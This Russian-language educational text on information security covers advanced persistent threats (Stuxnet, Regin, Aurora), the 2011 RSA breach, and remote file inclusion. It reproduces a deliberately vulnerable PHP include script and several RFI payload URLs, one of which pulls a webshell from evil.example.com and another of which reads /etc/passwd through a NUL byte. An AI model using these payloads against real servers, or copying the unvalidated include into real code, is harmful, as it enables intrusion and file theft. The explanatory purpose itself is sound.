Любые отклонения в поведении машины или сети должны вызывать пристальное внимание. Ниже в таблице представлены наиболее неприятные нарушения безопасности информационной системы, которые могут возникнуть из-за отсутствия постоянного внимания персонала (см , The Ghost in the Machine: A CCSS White Paper. Примеры, представленные ниже в таблице не перекрывают все возможные варианты, но дают представление о проблеме. Но грамотная настройка журнальных файлов и их обработка в реальном времени являются универсальными средствами обеспечения безопасности.

Особый класс атак образуют APT (Advanced Persistent Threat; см. http://en.wikipedia.org/wiki/Advanced_persistent_threat, а также Advanced Persistent Threats and other Advanced Attacks). Эти программы создают профессионалы, имеющие поддержку серьезных фирм или даже правительств. Одиночным энтузиастам тут делать нечего. Как правило, это целевые атаки. Целью таких атак обычно является шпионаж, реже саботаж, но и кражами данных на продажу атакеры не брезгуют. APT становится серьезной угрозой для всех крупных корпораций, но может представлять опасность экономическим интересам целых государств, таких как Великобритания. Примером APT можно считать компьютерного червя Stuxnet. Этот червь использует уязвимость программного контроллера оборудования (Siemens), а также атака, известная как операция Аврора (Aurora), предпринятая против 34 компаний, включая Google и Adobe. Ниже предлагается описание основных особенностей APT:

• Операторы, реализующие этот вид атак, используют весь спектр возможностей, которые существуют на текущий момент. Сюда входят технологии компьютерных вторжений, перехват телефонных разговоров, анализ информации со спутников. Отдельные компоненты могут быть взяты из стандартных инструментальных наборов в Интернет, но операторы атаки, если требуется, имеют доступ к любым другим средствам, включая разработку сколь угодно сложных программных продуктов. В процессе решения задачи используются все возможные меры скрытности работы.
• Операторы ориентируются на определенные специфические задачи, а не ищут наугад возможности финансовой или иной выгоды. Эта особенность предполагает, что атакеры контролируются извне. Работа производится целеустремленно для достижения строго определенных целей. Это не означает непрерывный поток атак. Чаще используется принцип “тише-едешь-дальше-будешь”. Если оператор теряет доступ к мишени, он будет пытаться восстановить такой доступ. Главной целью оператора является получение долгосрочного доступа к мишени атаки.
• APT представляют угрозу, так как атакеры имеют четко определенные намерения (как правило, вредоносные). APT атаки предпринимаются часто путем скоординированных действий большого числа участников. Обычно операторы имеют специфические цели, достаточно умелы, хорошо мотивированы, организованы и обеспечены всем необходимым.

Программа Stuxnet (2007) на момент создания была, пожалуй самой сложной, она использовала несколько уязвимостей, которые были ранее неизвестны. К началу 2013 года появилось большое число модификаций этого кода.

В простейшем варианте будущий атакер сначала собирает данные о персонале организации, названиях проектов, e-mail адресах, организационной структуре компании. Эти данные позднее используются в почтовом сообщении, адресованном одному или нескольким сотрудникам, чтобы убедить их в том, что это корпоративное сообщение и переадресовать их на вредоносный сайт. Отправителем проставляется сетевой администратор, WEB-master или один из знакомых коллег адресата.

Позднее эта технология совершенствовалась (см. "Stuxnet-like malware highlights need for skills and vigilance", Warwick Ashford, 24 November 2014). Появилась, например, версия троянского коня Backdoor.Regin, которая являлась своего рода шедевром программирования. Служебные файлы и некоторые секции исполняемого кода криптографичеси защищены. Программа была использована для шпионажа против правительственных организаций.Среди мишеней атаки этим кодам организации из России (28%), Саудовской Аравии (24%), Ирландии (8%) и Мексики (9%). Далее следуют структуры из Афганистана, Ирана, Бельгии, Австрии и Пакистана (~5%).

На рис. 13A показана схема атаки Styxnet

Рис. 13A.

Ниже приведенные примеры из статьи компании HP об RSA Breach of 2011 (The Next Generation IPS. Comprehensive Defense Against Advanced Persistent Threats).

Сначала атакер посылает почтовое сообщение со строкой в поле subject “2011 Recruitment Plan” четырем служащим EMC, родительской компании RSA (рис. 14). Почтовое сообщение выглядит, как посланное от webmaster домена Beyond.com (сайт подбора персонала).

Рис. 14.

Один из служащих извлек сообщение из своего ящика, прочитал его (“I forward this file to you for review. Please open and view it”) и открыл файл приложения Microsoft Excel file “2011 Recruitment plan.xls.” Файл Excel оказался пустым, за исключением небольшого символа в одной из ячеек (рис. 15).

Когда страница EXEL открылась, о произошло обращение к flash-объекту, была реализована уязвимость Adobe Flash (CVE-2011-0609), которая позволила загрузить троянского коня с удаленным доступом (RAT), называемым Poison Ivy, в систему служащего (рис. 15).

Рис. 15.

На фазе эксплуатации атакер выполняет следующие операции:

• Используя троянского коня, формирует канал управления.
• Осуществляет сканирование сети с целью выявления систем, содержащих нужную информацию.
• Ищутся пользователи-администраторы и крадутся их параметры доступа.
• Используя параметры доступа, можно получить доступ к системам с нужной информацией (процесс называется эскалацией привилегий).

На завершающей фазе проникновения атакер осуществляет следующее:

• Извлеченные конфиденциальные данные из скомпрометированных систем переносятся на серверы для последующей передачи во вне.
• Файлы архивируются и защищаются криптографически, после чего посредством FTP передаются по адресу good.mincesur.com, который часто используется для кибератак.
• Полученные данные использованы для выявления механизмов и средств аутентификации для реализации атак против клиентов RSA.

Смотри HP TippingPoint Next Generation Intrusion Prevention System (NGIPS).

Атаки APT предпринимались, начиная с 2006г, против Google (Aurora), Adobe и еще 20-30 компаний. Наиболее эффективным способом противодействия атакам APT является блокировка связи между скомпрометированной системой и атакером. Необходим глубокий мониторинг, как входящего, так и исходящего трафика как для e-mail, так и WEB-обменов.. APT могут проникать через Firewall за счет встраивания эксплойтов в данные, передаваемые посредством разрешенных протоколов. Стандартные IDS/IPS против APT неэффективны, так как APT обычно использует вредоносные коды "нулевого дня" (APT практически всегда уникальны).

Начиная с 2002 года появилась еще одна разновидность атаки, сходная по названию с APT - AVT - Advanced volatile threat. Эти вредоносные коды обычно разиещаются в оперативной памяти (а не на жестком диске). Эту угрозу нельзя выявить сканируя файловую систему.

Вредоносные коды часто внедряются в файлы: svchost.exe, iexplore.exe, iprinp.dll, and winzf32.dll. Атака APT обычно включает в себя несколько этапов:

1. Разведка (получение данных о системе и ее пользователях).
2. Вторжение в сеть (это может делаться с использованием фишинга в отношении сотрудников организации).
3. Формирование “черных ходов” в систему
4. Получение параметров аутентификации легальных пользователей.
5. Установка необходимых программных модулей
6. Получение высокого уровня доступа и отбор нужных файлов.
7. Если атакер подозревает о своем детектировании, он меняет методику и повышает скрытность.

Атака типа RFI чаще всего предпринимается против WEB-серверов, см. Remote file inclusion. При этом обычно используется скрипт на атакуемом сайте. Уязвимость связана с недостаточно тщательной проверкой параметров скрипта, поступающих извне. В случае PHP главной причиной является недостаточный контроль значений внешних переменных, таких как $_GET, $_POST, $_COOKIE. Язык PHP имеет директиву allow_url_fopen, и, если она сделана допустимой, то файловой системе разрешается использовать URL, который позволяет системе брать данные из удаленного источника. Ниже приведены примеры, взятые из wikipedia (см. вышеприведенную ссылку).

Рассмотрим PHP-скрипт (который включает файл, специфицированный в запросе):

<?php
   $color = 'blue';
   if (isset( $_GET['COLOR'] ) )
      $color = $_GET['COLOR'];
   include( $color . '.php' );
?>

<form method="get">
   <select name="COLOR">
      <option value="red">red</option>
      <option value="blue">blue</option>
   </select>
   <input type="submit">
</form>

Разработчик предполагал использование в качестве опций только blue.php и red.php. Но кто-то может вставить произвольные значения в COLOR, появляется возможность вставить код из файлов:

• /vulnerable.php?COLOR=http://evil.example.com/webshell.txt? - вставляет удаленно размещенный файл, содержащий вредоносный код.
• /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Выполняет код из уже загруженного файла с именем exploit.php (уязвимость вставления локального файла)
• /vulnerable.php?COLOR=C:\\notes.txt%00 - пример использования мета-символа NUL, чтобы удалить суффикс .php, разрешая доступ к файлам, отличным от .php.
• /vulnerable.php?COLOR=/etc/passwd%00 - позволяет атакеру читать содержимое файла паролей UNIX-системы (directory traversal).

Объем рынка компьютерных преступлений в России достигает 1 млрд долл в год (2011 год).

Представители разведки США считают, что основной угрозой для США сегодня являются кибер атаки (James Clapper, руководитель национальной безопасности администрации Обамы и Robert Mueller, директор ФБР).

• Web Application Security Statistics
• Spyware in the Enterprise: The Problem and the Solution
• A Crawler-based Study of Spyware on the Web, University of Washington
• Spyware, US-CERT
• Anti-Spyware Coalition Definitions Document, Anti-Spyware Coalition
• Spyware Enforcement, Center for Democracy and Technology
• Взлом Web 2.0: проникновение в Intranet, определение IP
• Vulnerability Summary for the Week of June 18, 2007
• Understanding Hidden Threats: Rootkits and Botnets
• Recognizing and Avoiding Spyware
• QUARTERLY TRENDS AND ANALYSIS REPORT (Доклад CERT за первый квартал 2007 года)
• US-CERT security tip
• Antimalware E-Guide
• Лаборатория Касперского
• www.stbernard.com
• Global Threat Research Report: Russia
• Корпоративная преступность вытесняет компьютерное мошенничество
• Сервер компании Symantec
• Федеральный план обеспечения сетевой и информационной безопасности США (2006 год). Материал рассчитан на чиновников, ответственных за политику безопасности.
• Центр реагирования на компьютерные инциденты Российской Федерации. Для знакомства с материалами необходима регистрация.
• ibm.com (безопасность WEB-приложений) .
• Gregg Keizer, TechWeb Technology News, January 24, 2006, “Botnet Creator Pleads Guilty, Faces 25 Years,”.
• ModSecurity
• AQTRONIX WebKnight
• Web Application Security Consortium
• Symantec, white_papers
• Security Focus WEB-site
• Protecting Against Evolving Web Threats
• База данных WHID - Web Hacking Incident Database
• Проект Bugtraq
• XSSed
• WEB Applications Security Consortium's Statistics Project
• Сайт с описаниями новинок антивирусов, анти-SPAM, анти-spyware и пр.
• Вирусный бюллетень.
• Security Technical Implementation Guides (STIG. (полезно просмотреть при выработке политики сетевой безопасности) в часности, например, WINDOWS Desktop Application. Security Technical Implimentation Guide
• Breach Security Labs
• Web hacking incident database (WHID).
• VB100 (virus) test procedures.
• Antivirus and Security White Papers.
• EXCERPTS FROM VIRUS BULLETIN COMPARATIVE REVIEWS FEBRUARY – JUNE 2010. Таблицы сопоставления эффективности различных антивирусных средств при детективровании разных вредоносных кодов. (Подготовлено компанией ESET)
• Microsoft Security Intelligence Report Volume 8 July through December 2009.
• Network Attack and Defense. Attributed by Roger Needham and Butler Lampson Хороший обзор по сетевым атакам и средствам противодействия (24 стр.).
• Список зараженных и потенциально опасных доменов. Осторожно! (лучше не заходить)
• The National Strategy to Secure Cyberspace
• Крис Каперски. Техника сетевых атак. Солон-Р. 2001
• Guidance for Addressing Malicious Code Risk
• Malicious Code Detection: BRIC Breaking Through Static Analysis

На сервере US-CERT можно найти много других полезных материалов и обзоров по тематике сетевой безопасности, в частности, о пробеме инсайдерских атак. Проблема инсайдеров должна быть одним из наиважнейших пунктов политики безопасности любой организации.